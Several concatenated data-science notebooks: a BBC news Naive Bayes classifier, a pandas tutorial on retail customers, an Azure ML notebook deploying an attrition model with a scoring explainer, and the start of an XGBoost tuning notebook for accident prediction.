# - [The Ultimate Day of Chicago Bikeshare](https://chrisluedtke.github.io/divvy-data.html) (Lambda School Data Science student)
# - [Using Phoebe for animations in Google Colab](https://colab.research.google.com/github/phoebe-project/phoebe2-docs/blob/2.1/tutorials/animations.ipynb)
#
# ## 2. Study for the Sprint Challenge
#
# - Concatenate DataFrames
# - Merge DataFrames
# - Reshape data with `pivot_table()` and `.melt()`
# - Be able to reproduce a FiveThirtyEight graph using Matplotlib or Seaborn.
#
# ## 3. Work on anything related to your portfolio site / Data Storytelling Project
# + id="7lLHHhW0z0vf" colab_type="code" colab={}
# TODO
| module4-sequence-your-narrative/Sanjay_Krishna__LS_DS_124_Sequence_your_narrative_Assignment.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/m-triassi/ai-projects-472/blob/main/Project1_task1.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] id="Uo3WIgPEko34"
# ## Task 1
# This task uses the BBC Dataset to train a Multinomial Naive Bayes classifier to distinguish between article types. A given article should be classified into one of 5 categories: business,
# entertainment, politics, sport, and tech.
#
# + id="q1oTGjoEmzFF"
# Import Dependencies
import numpy as np
import matplotlib.pyplot as plt
import os, os.path
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.model_selection import train_test_split
from sklearn.naive_bayes import MultinomialNB
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
from sklearn.metrics import accuracy_score
from sklearn.metrics import f1_score
import sklearn.datasets as datasets
from pathlib import Path
# + colab={"base_uri": "https://localhost:8080/"} id="TwiJHjSiuVtU" outputId="2f68dc29-9929-415f-8390-2f59622ef07b"
# Import Dataset
from google.colab import drive
# drive.mount('/content/drive', force_remount=True) # Only for development
# !gdown --id 1hg8v4l7iGcqW83tNwbBRlVaFtfNCn6rr
# !unzip /content/BBC.zip
# + id="aN4JRKbcjpsU" colab={"base_uri": "https://localhost:8080/", "height": 265} outputId="e86816e9-ac97-40c5-fc33-b351d713a368"
# Plot distribution of BBC Dataset
## Set up data + labels
dir = "/content/BBC"
y = np.array([])
curr_label = 1
labels = ["Business", "Entertainment", "Politics", "Sports", "Tech"]
## create a class distribution by adding a particular label to an array n times
## where n is the number of files per folder
for name in os.listdir(dir):
if os.path.isdir(os.path.join(dir, name)) and not name.startswith("."):
y = np.append(y, np.repeat(curr_label, len(os.listdir(os.path.join(dir, name)))))
curr_label += 1
## Set up the plot
plt.xticks(np.arange(1, 6), labels)
n, bins, patches = plt.hist(y, bins=5, facecolor='b', alpha=0.75, ec="k")
plt.show()
# + id="-lF4oXm2mww9"
# Load Corpus
corpus = datasets.load_files(dir, encoding='latin1')
y = corpus.target
# + id="hoJH5UNIm5Lz" colab={"base_uri": "https://localhost:8080/"} outputId="90993ca5-9b55-41d1-9d63-c03807f54af3"
# Pre-Process Data set
## vectorize texts into word frequencies for model use
vectorizer = CountVectorizer()
X_text = vectorizer.fit_transform(corpus['data'])
print(X_text.shape, y.shape)
# + id="iZg3xIwQm7tc"
# Split Dataset
X_train, X_test, y_train, y_test = train_test_split(X_text, y, test_size=.20, random_state=None)
# + [markdown] id="5zSqyggyiAWv"
#
#
# ---
#
#
# #Naive Bayes: Try 1
#
#
# ---
#
#
#
# + id="1PNmC9F4m-8G" colab={"base_uri": "https://localhost:8080/"} outputId="c8abcde6-b68a-4f54-e6f4-426f958358b8"
# Train Naive Bayes: Try 1
nb_one = MultinomialNB()
nb_one.fit(X_train, y_train)
# + [markdown] id="t6H2M0Q5gkwA"
# ##(B)
# ###Confusion Matrix
#
# + colab={"base_uri": "https://localhost:8080/"} id="SUlN2I4Deq5_" outputId="84d6bcab-07dc-4f6a-b09f-cd2a80f6d867"
print (nb_one.score(X_test, y_test))
y_pred = nb_one.predict(X_test)
# print(y_test)
# print(y_pred)
print(confusion_matrix(y_test, y_pred))
# + [markdown] id="lXtAxYsYiHoi"
# ## (C)
# ###Precision, Recall, F1-measure
# + colab={"base_uri": "https://localhost:8080/"} id="wsm-lNsiiSdf" outputId="bffeebc2-89d7-4c4b-da11-51f92dafb977"
print(classification_report(y_test, y_pred, target_names=labels))
# + [markdown] id="6BfgTBQIj_FY"
# ## (D)
# + [markdown] id="UiQ2UJmLlIJl"
# ###Accuracy
# + colab={"base_uri": "https://localhost:8080/"} id="5qLIpjivkMF-" outputId="c6196631-9a37-4f06-c10a-2bc858a4213a"
print(accuracy_score(y_test, y_pred))
print(accuracy_score(y_test, y_pred, normalize=False))
# + [markdown] id="q-r35HiflKEi"
# ### Macro average F1
# + colab={"base_uri": "https://localhost:8080/"} id="gt1pVt8ulVzL" outputId="eb4a04ae-3a90-4022-e708-986e9766409e"
f1_score(y_test, y_pred, average = 'macro')
# + [markdown] id="OnjLFjdAlMQm"
# ###Weighted average F1
# + colab={"base_uri": "https://localhost:8080/"} id="-hGxOTk0llXp" outputId="6d8f5ffa-063c-4d8e-bc53-de5075582688"
f1_score(y_test, y_pred, average = 'weighted')
# + [markdown] id="gX-Ih3aYl6DI"
# ##(E)
# ###Prior probability of each class
# + id="mqzqr7itmBLd"
# The fitted class priors are exposed (on a log scale) via class_log_prior_
np.exp(nb_one.class_log_prior_)
# + [markdown] id="NeiexWhRNlje"
# ## (F)
#
# ### Size of Vocabulary
# + colab={"base_uri": "https://localhost:8080/"} id="3m2NX4f7OGVZ" outputId="029139b3-89b4-49eb-e073-0ff1991bdf81"
len(vectorizer.vocabulary_)
# + [markdown] id="We9JVIguS8jI"
# ## (E)
#
# ### Number of Word-tokens in each class
# + colab={"base_uri": "https://localhost:8080/"} id="K3H3wM1qTBjc" outputId="d3f4500c-0b31-419f-9001-9651a3beee42"
class_count = [0, 0, 0, 0, 0]
array_text = X_text.toarray()
for index in range(len(array_text)):
class_count[y[index]] += sum(array_text[index])  # corpus.target labels are 0-indexed
print(class_count)
# + [markdown] id="wVp2l3BIQZzC"
# ## (H)
#
# ### Number of Word-tokens in corpus
# + colab={"base_uri": "https://localhost:8080/"} id="3h2ynG7YQ7Xv" outputId="c5155469-2b16-444a-9937-94ed150f7234"
sum(map(sum, array_text))
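# The double `sum` above works on the densified matrix; calling `.sum()` on the sparse matrix gives the same total without the dense copy. A tiny self-contained sketch (the toy corpus is an assumption):

```python
from sklearn.feature_extraction.text import CountVectorizer

docs = ["the cat sat", "the dog sat on the mat"]
X = CountVectorizer().fit_transform(docs)   # sparse document-term matrix
dense_total = sum(map(sum, X.toarray()))    # densifies first
sparse_total = X.sum()                      # same total, no dense copy
print(dense_total, sparse_total)  # 9 9
```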
# + [markdown] id="B3CuOUWlYvjH"
# ## (I)
#
# ## Words with Freq of zero in each class
# + id="9PRMfogPY8lZ"
# For each class, count vocabulary words whose total frequency in that class is zero
class_zero_count = [int((array_text[y == c].sum(axis=0) == 0).sum()) for c in range(5)]
print(class_zero_count)
# + [markdown] id="uvdr_uf8ecom"
# ## (I)
#
# ## Words with Freq of one in entire corpus
# + id="RyZ9qQnhef41"
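# The empty cell above can be filled by counting vocabulary words whose total corpus frequency is exactly one. A self-contained sketch on a toy corpus (the toy documents are assumptions; the notebook's own `array_text` would replace `X.toarray()`):

```python
from sklearn.feature_extraction.text import CountVectorizer

docs = ["the cat sat", "the dog sat on the mat"]
X = CountVectorizer().fit_transform(docs)
# vocabulary words appearing exactly once in the whole corpus
once = int((X.toarray().sum(axis=0) == 1).sum())
print(once)  # 4 (cat, dog, mat, on)
```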
# + [markdown] id="gJGl9cwLhvUx"
# # Naive Bayes: Try 2
#
# Note: cells displaying model performance will be omitted in all future tries in favor of generating an addition to the text-file report.
# + id="YGJqiZvtoAcd" colab={"base_uri": "https://localhost:8080/"} outputId="61e2aa4e-a23c-4061-ff5f-b714d82b87fc"
# Train Naive Bayes: Try 2
nb_two = MultinomialNB()
nb_two.fit(X_train, y_train)
# + [markdown] id="nAqUg0w6h4E-"
# #Naive Bayes: Try 3
# + id="Z1eAYO5moBbz" colab={"base_uri": "https://localhost:8080/"} outputId="e34beb53-4dbd-4420-9aad-881635db74ea"
# Train Naive Bayes: Try 3
nb_three = MultinomialNB(alpha=0.0001)
nb_three.fit(X_train, y_train)
# + [markdown] id="Aap1vgbaTOg_"
# # Naive Bayes: Try 4
# + id="OwsyBRoYoFFQ" colab={"base_uri": "https://localhost:8080/"} outputId="1b55dfe0-037b-4a62-95de-ee0feb554744"
# Train Naive Bayes: Try 4
nb_four = MultinomialNB(alpha=0.9)
nb_four.fit(X_train, y_train)
# + id="Uu47oieGoLv7"
# Generate / Append to performance file
# model is the instance of NB, label is the text that will show at the top of the run
#
def generate_report(model, label, vector, dataset):
"""
Appends to a report file with the statistics of a particular model run.
Parameters
----------
model : object
Instance of the machine learning model, NB, Decision tree, etc
label : string
String that will appear at the top of a particular run in the text file
vector : object
CountVectorizer instance, fit on the current corpus
dataset : object
the fit_transform output of the above vectorizer
"""
f = open("bbc_performance.txt", "a")
f.write("\n==========================================================")
f.write("\nAttempt Description: " + label)
f.write("\nConfusion Matrix + Score:\n")
f.write(str(model.score(X_test, y_test)))
f.write("\n")
y_pred = model.predict(X_test)
f.write(str(confusion_matrix(y_test, y_pred)))
f.write("\nClassification Report (precision, recall, and F1-measure )\n")
f.write(str(classification_report(y_test, y_pred, target_names=labels)))
f.write("\nAccuracy Score: accuracy, macro-average F1 and weighted-average F1\n")
f.write(str(accuracy_score(y_test, y_pred, normalize=False)))
f.write("\n")
f.write(str(f1_score(y_test, y_pred, average = 'macro')))
f.write("\n")
f.write(str(f1_score(y_test, y_pred, average = 'weighted')))
f.write("\n")
f.write("\nSize of Vocabulary\n")
f.write(str(len(vector.vocabulary_)))
f.write("\nNumber of Word Tokens in each class\n\n")
class_count = [0, 0, 0, 0, 0]
array_text = dataset.toarray()
for index in range(len(array_text)):
class_count[y[index]] += sum(array_text[index])  # corpus.target labels are 0-indexed
f.write(str(class_count))
f.write("\n")
f.write("\nNumber of Word Tokens in Entire Corpus\n\n")
f.write(str(sum(map(sum, array_text))))
f.close()
generate_report(nb_one, "Multi-nomialNB default values, try 1", vectorizer, X_text)
generate_report(nb_two, "Multi-nomialNB default values, try 2", vectorizer, X_text)
generate_report(nb_three, "Multi-nomialNB with 0.0001 smoothing, try 3", vectorizer, X_text)
generate_report(nb_four, "Multi-nomialNB with 0.9 smoothing, try 4", vectorizer, X_text)
| Project 1/Project1_task1.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Questions
# 1. Find top 5 customers in 2015
# 2. Find top customers in 2014 that did not buy in 2015
# 3. Select details(all columns) for a given set of customers
# 4. Select 2015 transaction amount and number of transactions for the same customers
# # Pandas DataFrames Basics
#Import Packages
#Import Dataset (Retail_Data_Customers_Summary.csv)
# ## Find top 5 customers in 2015
# **Concepts covered:**
# 1. head()
# 2. sort()
#Typing the dataframe name "customers" displays the first 5 and last 5 rows
# ### head()
#If you use head(), it returns the top 5 rows
# ### sort()
#To find the top 5 customers, we need to sort by tran_amount_2015 in descending order
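# A minimal sketch of the sort on toy data (the real notebook loads Retail_Data_Customers_Summary.csv; the toy ids and amounts here are assumptions):

```python
import pandas as pd

customers = pd.DataFrame({
    "customer_id": ["CS1", "CS2", "CS3", "CS4", "CS5", "CS6"],
    "tran_amount_2015": [500, 1200, 300, 900, 1100, 700],
})
top5 = customers.sort_values("tran_amount_2015", ascending=False).head(5)
print(top5["customer_id"].tolist())  # ['CS2', 'CS5', 'CS4', 'CS6', 'CS1']
```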
# ## Find top customers in 2014 that did not buy in 2015
# **Concepts covered: Slicing Dataframe**
# 1. Selecting Single Columns/Multiple Columns
# 2. Sort when data contains NA (na_position argument)
# ### Select Single Column
#To find the top 5 customers, we need to sort by tran_amount_2014 in descending order
#Then look at the tran_amount_2015 column to identify those who did not buy
#We will store in a new dataframe name
# ### Select Multiple Column
#Then we will select the relevant columns to answer the question
# ### Sort when data contains "NA"
#When sorting a column that contains NA, the na_position argument controls where those rows appear
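# A sketch of `na_position` on toy data (column names assumed): NaN in `tran_amount_2015` marks the 2014 buyers who did not buy in 2015, and `na_position='first'` surfaces them at the top:

```python
import numpy as np
import pandas as pd

df = pd.DataFrame({
    "customer_id": ["CS1", "CS2", "CS3"],
    "tran_amount_2014": [800, 950, 600],
    "tran_amount_2015": [np.nan, 700, np.nan],
})
# rows with NaN in 2015 sort to the top, ahead of the non-null values
lapsed_first = df.sort_values("tran_amount_2015", na_position="first")
print(lapsed_first["customer_id"].tolist())
```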
# ## Select details(all columns) for a given set of customers
# **Concepts covered:**
# 1. Indexing Column
# 2. Slicing Dataframe
# 3. Selecting Single Row/Multiple Rows (.loc())
# 4. Making Permanent change to existing dataframe (inplace = True argument)
# **Sample Customers:** (CS4074, CS5057, CS2945, CS4798, CS4424)
# ### Understanding Basics
#Returns an error as this id is not present in any column name
#so we use .loc to slice/select data by rows
#Still gives an error, as it is unable to find this id in a row (but which row?)
# + cell_style="center"
#The default index is 0,1,2,3,4,5 ...
# -
# ### Slicing Rows using (.loc())
# + cell_style="center"
#We can select one row by mentioning the index number
# -
# ### Indexing existing DataFrame
#We need to set index before we could easily select rows (just like setting a primary key in SQL)
#The output above shows the index set; however, when we check the dataframe again, it is back to the default
# ### Making change permanent (inplace = True)
#If you want to make permanent change to the dataframe, we use the inplace argument
#Now the change is permanent
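# A sketch of `set_index(..., inplace=True)` followed by a single-row `.loc` lookup (the customer ids come from the sample list below; the amounts are assumptions):

```python
import pandas as pd

customers = pd.DataFrame({
    "customer_id": ["CS4074", "CS5057", "CS2945"],
    "tran_amount_2015": [310, 0, 125],
})
customers.set_index("customer_id", inplace=True)  # change is permanent
row = customers.loc["CS4074"]                     # select one row by label
print(row["tran_amount_2015"])  # 310
```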
# **List of Customers:** (CS4074, CS5057, CS2945, CS4798, CS4424)
#Now if look for details of a customer, we will be able to find it
# ### Multiple rows selection .loc
#To get details of 5 customers, we use a list
# ## Select 2015 transaction amount and number of transactions for the same customers
# 1. Selecting multiple columns and rows using (.loc())
# 2. Erasing index for a DataFrame (reset_index())
# ### Selecting multiple columns and rows using (.loc())
#We can extend .loc to select both rows and columns (begin with list customers from rows then select columns)
# ### Erasing index for a DataFrame (reset_index())
#We can no longer select customers using (.loc())
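# The last two sections can be sketched together on toy data (column names such as `num_trans_2015` are assumptions): `.loc` with row and column lists, then `reset_index()` to erase the index:

```python
import pandas as pd

customers = pd.DataFrame(
    {"tran_amount_2015": [310, 0, 125], "num_trans_2015": [4, 0, 2]},
    index=pd.Index(["CS4074", "CS5057", "CS2945"], name="customer_id"),
)
# row list + column list in one .loc call
subset = customers.loc[["CS4074", "CS2945"], ["tran_amount_2015", "num_trans_2015"]]
flat = customers.reset_index()  # index back to 0,1,2; customer_id becomes a column
print(subset.shape, flat.columns.tolist())
```

# After `reset_index()`, label-based `.loc` on customer ids no longer works, which is exactly what the cell above demonstrates.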
# # END
# **Pandas Concepts Covered:**
# 1. head()
# 2. sort()
# 3. Set Index
# 4. Slicing/Selecting DataFrames (columns, rows using .loc)
# 5. Argument (inplace = True)
# 6. Resetting index
| Pandas Basics with Retail Customers/Working/3_Data_Frames_Working.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3.6
# language: python
# name: python36
# ---
# Copyright (c) Microsoft Corporation. All rights reserved.
#
# Licensed under the MIT License.
# 
# # Train and explain models locally and deploy model and scoring explainer
#
#
# _**This notebook illustrates how to use the Azure Machine Learning Interpretability SDK to deploy a locally-trained model and its corresponding scoring explainer to Azure Container Instances (ACI) as a web service.**_
#
#
#
#
#
# Problem: IBM employee attrition classification with scikit-learn (train and explain a model locally and use Azure Container Instances (ACI) for deploying your model and its corresponding scoring explainer as a web service.)
#
# ---
#
# ## Table of Contents
#
# 1. [Introduction](#Introduction)
# 1. [Setup](#Setup)
# 1. [Run model explainer locally at training time](#Explain)
# 1. Apply feature transformations
# 1. Train a binary classification model
# 1. Explain the model on raw features
# 1. Generate global explanations
# 1. Generate local explanations
# 1. [Visualize explanations](#Visualize)
# 1. [Deploy model and scoring explainer](#Deploy)
# 1. [Next steps](#Next)
# ## Introduction
#
#
# This notebook showcases how to train and explain a classification model locally, and deploy the trained model and its corresponding explainer to Azure Container Instances (ACI).
# It demonstrates the API calls needed to submit a run for training and explaining a model to AMLCompute, download the computed explanations, and visualize the global and local explanations via a visualization dashboard that provides an interactive way of discovering patterns in model predictions and downloaded explanations. It also demonstrates how to use Azure Machine Learning MLOps capabilities to deploy your model and its corresponding explainer.
#
# We will showcase one of the tabular data explainers: TabularExplainer (SHAP) and follow these steps:
# 1. Develop a machine learning script in Python which involves the training script and the explanation script.
# 2. Run the script locally.
# 3. Use the interpretability toolkit’s visualization dashboard to visualize predictions and their explanations. If the metrics and explanations don't indicate a desired outcome, loop back to step 1 and iterate on your scripts.
# 4. After a satisfactory run is found, create a scoring explainer and register the persisted model and its corresponding explainer in the model registry.
# 5. Develop a scoring script.
# 6. Create an image and register it in the image registry.
# 7. Deploy the image as a web service in Azure.
#
# ## Setup
# Make sure you go through the [configuration notebook](../../../../configuration.ipynb) first if you haven't.
# +
# Check core SDK version number
import azureml.core
print("SDK version:", azureml.core.VERSION)
# -
# ## Initialize a Workspace
#
# Initialize a workspace object from persisted configuration
# + tags=["create workspace"]
from azureml.core import Workspace
ws = Workspace.from_config()
print(ws.name, ws.resource_group, ws.location, ws.subscription_id, sep='\n')
# -
# ## Explain
# Create an experiment. An **Experiment** is a logical container in an Azure ML Workspace; it hosts run records, which can include run metrics and output artifacts from your experiments.
from azureml.core import Experiment
experiment_name = 'explain_model_at_scoring_time'
experiment = Experiment(workspace=ws, name=experiment_name)
run = experiment.start_logging()
# +
# get IBM attrition data
import os
import pandas as pd
outdirname = 'dataset.6.21.19'
try:
from urllib import urlretrieve
except ImportError:
from urllib.request import urlretrieve
import zipfile
zipfilename = outdirname + '.zip'
urlretrieve('https://publictestdatasets.blob.core.windows.net/data/' + zipfilename, zipfilename)
with zipfile.ZipFile(zipfilename, 'r') as unzip:
unzip.extractall('.')
attritionData = pd.read_csv('./WA_Fn-UseC_-HR-Employee-Attrition.csv')
# +
from sklearn.model_selection import train_test_split
try:
    import joblib
except ImportError:  # scikit-learn < 0.23 bundled joblib under sklearn.externals
    from sklearn.externals import joblib
from sklearn.preprocessing import StandardScaler, OneHotEncoder
from sklearn.impute import SimpleImputer
from sklearn.pipeline import Pipeline
from sklearn.linear_model import LogisticRegression
from sklearn.ensemble import RandomForestClassifier
from sklearn_pandas import DataFrameMapper
from interpret.ext.blackbox import TabularExplainer
os.makedirs('./outputs', exist_ok=True)
# Dropping Employee count as all values are 1 and hence attrition is independent of this feature
attritionData = attritionData.drop(['EmployeeCount'], axis=1)
# Dropping Employee Number since it is merely an identifier
attritionData = attritionData.drop(['EmployeeNumber'], axis=1)
# Dropping Over18 since all values are 'Y'
attritionData = attritionData.drop(['Over18'], axis=1)
# Dropping StandardHours since all values are 80
attritionData = attritionData.drop(['StandardHours'], axis=1)
# Converting target variables from string to numerical values
target_map = {'Yes': 1, 'No': 0}
attritionData["Attrition_numerical"] = attritionData["Attrition"].apply(lambda x: target_map[x])
target = attritionData["Attrition_numerical"]
attritionXData = attritionData.drop(['Attrition_numerical', 'Attrition'], axis=1)
# Creating dummy columns for each categorical feature
categorical = []
for col, value in attritionXData.items():
if value.dtype == 'object':
categorical.append(col)
# Store the numerical columns in a list numerical
numerical = attritionXData.columns.difference(categorical)
numeric_transformations = [([f], Pipeline(steps=[
('imputer', SimpleImputer(strategy='median')),
('scaler', StandardScaler())])) for f in numerical]
categorical_transformations = [([f], OneHotEncoder(handle_unknown='ignore', sparse=False)) for f in categorical]
transformations = numeric_transformations + categorical_transformations
# Append classifier to preprocessing pipeline.
# Now we have a full prediction pipeline.
clf = Pipeline(steps=[('preprocessor', DataFrameMapper(transformations)),
('classifier', RandomForestClassifier())])
# Split data into train and test
from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test = train_test_split(attritionXData,
target,
test_size = 0.2,
random_state=0,
stratify=target)
# preprocess the data and fit the classification model
clf.fit(x_train, y_train)
model = clf.steps[-1][1]
model_file_name = 'log_reg.pkl'
# save the model in the outputs folder so it automatically gets uploaded
joblib.dump(value=clf, filename=os.path.join('./outputs/', model_file_name))
# +
# Explain predictions on your local machine
tabular_explainer = TabularExplainer(model,
initialization_examples=x_train,
features=attritionXData.columns,
classes=["Not leaving", "leaving"],
transformations=transformations)
# Explain overall model predictions (global explanation)
# Passing in test dataset for evaluation examples - note it must be a representative sample of the original data
# x_train can be passed as well; with more examples the explanations take
# longer to compute, but they may be more accurate
global_explanation = tabular_explainer.explain_global(x_test)
# +
from azureml.interpret.scoring.scoring_explainer import TreeScoringExplainer, save
# ScoringExplainer
scoring_explainer = TreeScoringExplainer(tabular_explainer)
# Pickle scoring explainer locally
save(scoring_explainer, exist_ok=True)
# Register original model
run.upload_file('original_model.pkl', os.path.join('./outputs/', model_file_name))
original_model = run.register_model(model_name='local_deploy_model',
model_path='original_model.pkl')
# Register scoring explainer
run.upload_file('IBM_attrition_explainer.pkl', 'scoring_explainer.pkl')
scoring_explainer_model = run.register_model(model_name='IBM_attrition_explainer', model_path='IBM_attrition_explainer.pkl')
# -
# ## Visualize
# Visualize the explanations
from azureml.contrib.interpret.visualize import ExplanationDashboard
ExplanationDashboard(global_explanation, clf, x_test)
# ## Deploy
#
# Deploy Model and ScoringExplainer
# +
from azureml.core.conda_dependencies import CondaDependencies
# WARNING: to install this, g++ needs to be available on the Docker image and is not by default (look at the next cell)
azureml_pip_packages = [
'azureml-defaults', 'azureml-contrib-interpret', 'azureml-core', 'azureml-telemetry',
'azureml-interpret'
]
# specify CondaDependencies obj
myenv = CondaDependencies.create(conda_packages=['scikit-learn', 'pandas'],
pip_packages=['sklearn-pandas', 'pyyaml'] + azureml_pip_packages,
pin_sdk_version=False)
with open("myenv.yml","w") as f:
f.write(myenv.serialize_to_string())
with open("myenv.yml","r") as f:
print(f.read())
# -
# %%writefile dockerfile
RUN apt-get update && apt-get install -y g++
from azureml.core.model import Model
# retrieve scoring explainer for deployment
scoring_explainer_model = Model(ws, 'IBM_attrition_explainer')
# +
from azureml.core.webservice import Webservice
from azureml.core.model import InferenceConfig
from azureml.core.webservice import AciWebservice
from azureml.core.model import Model
aciconfig = AciWebservice.deploy_configuration(cpu_cores=1,
memory_gb=1,
tags={"data": "IBM_Attrition",
"method" : "local_explanation"},
description='Get local explanations for IBM Employee Attrition data')
inference_config = InferenceConfig(runtime= "python",
entry_script="score_local_explain.py",
conda_file="myenv.yml",
extra_docker_file_steps="dockerfile")
# Use configs and models generated above
service = Model.deploy(ws, 'model-scoring', [scoring_explainer_model, original_model], inference_config, aciconfig)
service.wait_for_deployment(show_output=True)
# +
import requests
import json
# Create data to test service with
sample_data = '{"Age":{"899":49},"BusinessTravel":{"899":"Travel_Rarely"},"DailyRate":{"899":1098},"Department":{"899":"Research & Development"},"DistanceFromHome":{"899":4},"Education":{"899":2},"EducationField":{"899":"Medical"},"EnvironmentSatisfaction":{"899":1},"Gender":{"899":"Male"},"HourlyRate":{"899":85},"JobInvolvement":{"899":2},"JobLevel":{"899":5},"JobRole":{"899":"Manager"},"JobSatisfaction":{"899":3},"MaritalStatus":{"899":"Married"},"MonthlyIncome":{"899":18711},"MonthlyRate":{"899":12124},"NumCompaniesWorked":{"899":2},"OverTime":{"899":"No"},"PercentSalaryHike":{"899":13},"PerformanceRating":{"899":3},"RelationshipSatisfaction":{"899":3},"StockOptionLevel":{"899":1},"TotalWorkingYears":{"899":23},"TrainingTimesLastYear":{"899":2},"WorkLifeBalance":{"899":4},"YearsAtCompany":{"899":1},"YearsInCurrentRole":{"899":0},"YearsSinceLastPromotion":{"899":0},"YearsWithCurrManager":{"899":0}}'
headers = {'Content-Type':'application/json'}
# send request to service
resp = requests.post(service.scoring_uri, sample_data, headers=headers)
print("POST to url", service.scoring_uri)
# can convert back to Python objects from json string if desired
print("prediction:", resp.text)
result = json.loads(resp.text)
# +
#plot the feature importance for the prediction
import numpy as np
import matplotlib.pyplot as plt; plt.rcdefaults()
labels = json.loads(sample_data)
labels = labels.keys()
objects = labels
y_pos = np.arange(len(objects))
performance = result["local_importance_values"][0][0]
plt.bar(y_pos, performance, align='center', alpha=0.5)
plt.xticks(y_pos, objects)
locs, labels = plt.xticks()
plt.setp(labels, rotation=90)
plt.ylabel('Feature impact - leaving vs not leaving')
plt.title('Local feature importance for prediction')
plt.show()
# -
service.delete()
# ## Next
# Learn about other use cases of the explain package on a:
# 1. [Training time: regression problem](../../tabular-data/explain-binary-classification-local.ipynb)
# 1. [Training time: binary classification problem](../../tabular-data/explain-binary-classification-local.ipynb)
# 1. [Training time: multiclass classification problem](../../tabular-data/explain-multiclass-classification-local.ipynb)
# 1. Explain models with engineered features:
# 1. [Simple feature transformations](../../tabular-data/simple-feature-transformations-explain-local.ipynb)
# 1. [Advanced feature transformations](../../tabular-data/advanced-feature-transformations-explain-local.ipynb)
# 1. [Save model explanations via Azure Machine Learning Run History](../run-history/save-retrieve-explanations-run-history.ipynb)
# 1. [Run explainers remotely on Azure Machine Learning Compute (AMLCompute)](../remote-explanation/explain-model-on-amlcompute.ipynb)
# 1. [Inferencing time: deploy a remotely-trained model and explainer](./train-explain-model-on-amlcompute-and-deploy.ipynb)
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] colab_type="text" id="Nov4PD2bWvzW"
# # Tuning
# + [markdown] id="dOaOqUl37a57" colab_type="text"
# Okay. We wrangled some data, ran a simple prediction and then added some more data. Let's stop for a moment, before we add even more data, and do some preliminary work.
#
# > We'll first try to understand why [johnowhitaker](https://datasciencecastnet.home.blog/2019/10/19/zindi-uberct-part-1-getting-started/) recommends ```logloss``` as a metric. Then we'll establish a baseline, so we know whether we're improving or not. And finally, some basic tuning of the following parameters:
#
# * ```learning_rate```;
# * ```n_estimators```;
# * ```min_child_weight```;
# * ```max_depth```;
# * ```gamma```;
# * ```colsample_bytree```;
# * ```subsample```; and
# * ```reg_alpha```.
#
# > NOTE: I'm not a data scientist nor a machine learning expert and will not attempt any ```up/down/re-sampling``` or other techniques, such as ```SMOTE```, to balance this extremely imbalanced dataset. I'll use the built-in parameters (```scale_pos_weight``` and ```max_delta_step```) with a ```threshold``` to, hopefully, get a meaningful result. My aim here is to understand how this works.
#
# *!!!! I had no idea ```parameter tuning``` was this time intensive. Running this ```notebook``` on a laptop will take more than a week !!!*
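# The ```threshold``` idea mentioned above is simple: the model outputs a probability of class membership, and we pick the cut-off that converts it into a crisp label. A minimal sketch (the probabilities are toy values, not model output):

```python
import numpy as np

# Toy predicted probabilities of the positive class - illustrative only
probs = np.array([0.02, 0.40, 0.70, 0.95])

# Any probability at or above the threshold becomes class 1
threshold = 0.5
labels = (probs >= threshold).astype(int)      # -> [0, 0, 1, 1]

# Lowering the threshold flags more positives, trading precision for
# recall on the rare class
labels_low = (probs >= 0.3).astype(int)        # -> [0, 1, 1, 1]
```

# Sweeping the threshold against the validation ```f1_score``` is one way to pick it; we come back to this after tuning.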
# + colab_type="code" id="FfLklF9nWvcj" colab={}
#because we're on google colab
# !pip install --upgrade pandas
# !pip install --upgrade geopandas
# #!pip install --upgrade seaborn
# + colab_type="code" id="fYS5LT6EWeiO" colab={}
# import the modules that make the magic possible
import pandas as pd
import geopandas as gpd
import numpy as np
from pathlib import Path
import matplotlib.pyplot as plt
import pickle
from joblib import dump
# + colab_type="code" id="UT_LzC2EEqeo" colab={}
import xgboost as xgb
from xgboost import XGBClassifier, plot_importance
from collections import Counter
from sklearn.model_selection import cross_val_score, StratifiedKFold, GridSearchCV, train_test_split
from sklearn import metrics
from sklearn.metrics import f1_score, classification_report, auc, log_loss, accuracy_score, confusion_matrix, precision_score, mean_squared_error, recall_score,roc_auc_score, roc_curve, average_precision_score,precision_recall_curve, mean_absolute_error
from numpy import where, mean, sqrt, argmax, arange
# + colab_type="code" id="ABt-CrXsWuVs" colab={}
# mount google drive as a file system
from google.colab import drive
drive.mount('/content/gdrive', force_remount=True)
# + colab_type="code" id="cYCuRi82X0YD" colab={}
#set path
path = Path('/content/gdrive/My Drive/Zindi_Accident')
# + colab_type="code" id="CD4zX0SubZRR" colab={}
import sys
sys.path.append('/content/gdrive/My Drive/Zindi_Accident')
# load a custom confusion_matrix tool for plotting
# courtesy - leportella (https://github.com/leportella/federal-road-accidents)
from tools import plot_confusion_matrix
# + [markdown] id="1ubaEYC9WTDU" colab_type="text"
# #### Load the data
# + colab_type="code" id="tx2JRqo9tGyA" colab={}
#load the train and test from the previous notebook
train = pd.read_csv(path/'data/train_with_weather.csv', parse_dates = ['datetime'])
test = pd.read_csv(path/'data/test_with_weather.csv', parse_dates = ['datetime'])
# + id="IUPHkBdQW9es" colab_type="code" colab={}
# define a list of column names to be used for training
x_cols = ['month', 'day', 'hour', 'longitude', 'latitude', 'WIDTH', 'LANES',
'Air_temp', 'Atmos_press', 'Atmos_press_MeanSea', 'Humidity', 'MeanWindSpeed', 'Visibility', 'DewPoint', 'Rainfall']
# + colab_type="code" id="BzPbvl3is3u2" colab={}
X, y = train[x_cols], train['y']
# + colab_type="code" id="9fe89VsIWACo" colab={}
